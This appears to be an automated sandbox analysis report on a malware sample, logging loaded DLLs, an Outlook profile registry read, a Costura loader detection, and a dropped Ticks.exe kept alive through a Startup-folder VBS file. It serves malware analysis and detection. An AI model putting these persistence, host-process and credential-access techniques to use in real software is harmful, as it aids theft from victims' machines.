Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\50201668.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\50201668.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 50201668.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 50201668.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 50201668.exe, 00000006.00000002.1425364910.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, 50201668.exe, 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, 50201668.exe, 00000006.00000002.1421354221.0000000004249000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 50201668.exe, 00000006.00000002.1425364910.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, 50201668.exe, 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, 50201668.exe, 00000006.00000002.1421354221.0000000004249000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 50201668.exe, 00000006.00000002.1425059266.0000000006F60000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 50201668.exe, 00000006.00000002.1425059266.0000000006F60000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Yara detected Costura Assembly Loader

Source: Yara match	File source: 6.2.50201668.exe.6e70000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.50201668.exe.6e70000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1412323204.0000000003297000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1424420311.0000000006E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1690167181.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 50201668.exe PID: 6920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ticks.exe PID: 7824, type: MEMORYSTR

Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DD1614 push ds; ret	6_2_06DD1617
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DD52FB push es; iretd	6_2_06DD5398
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DD5241 push es; iretd	6_2_06DD5398
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DD1D95 push E8FFFFFEh; retf	6_2_06DD1DA1
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DEFCA0 pushad ; ret	6_2_06DEFCA1
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DF921C pushfd ; retf	6_2_06DF921D
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DF0A70 pushfd ; ret	6_2_06DF0A7D
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DF0A38 pushfd ; retf	6_2_06DF0A39
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DF69F1 push es; retf	6_2_06DF69F8
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06E0EA0F push es; iretd	6_2_06E0EA10
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06E0A93B push es; ret	6_2_06E0A940
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF62ED push es; ret	6_2_06EF62FC
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF5EF9 push es; ret	6_2_06EF5EFC
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF6212 push es; iretd	6_2_06EF6214
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF6475 push es; retf	6_2_06EF6480
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF61C6 push es; ret	6_2_06EF6200
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF9583 push es; ret	6_2_06EF95C4
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF6558 push eax; retf	6_2_06EF6565
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF8136 push es; retn EF7Eh	6_2_06EF814C
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF610D push es; iretd	6_2_06EF61A0
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06FB3661 push esi; retf	6_2_06FB3667
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_0719F049 pushad ; retf	6_2_0719F055
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_07273DB0 push edi; ret	6_2_07273DB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0714946F push es; ret	9_2_07149480
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_014AD928 pushad ; ret	12_2_014AD929
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_014AE8B0 push esp; iretd	12_2_014AE8B1
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C1544F pushad ; ret	12_2_06C1552D
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C15470 pushad ; ret	12_2_06C1552D
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C71614 push ds; ret	12_2_06C71617
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C71D95 push E8FFFFFEh; retf	12_2_06C71DA1
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C8FCA0 pushad ; ret	12_2_06C8FCA1

Source: C:\Users\user\Desktop\50201668.exe

File created: C:\Users\user\AppData\Roaming\Ticks.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\50201668.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\50201668.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs

Jump to behavior

Source: C:\Users\user\Desktop\50201668.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs

Jump to behavior

Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
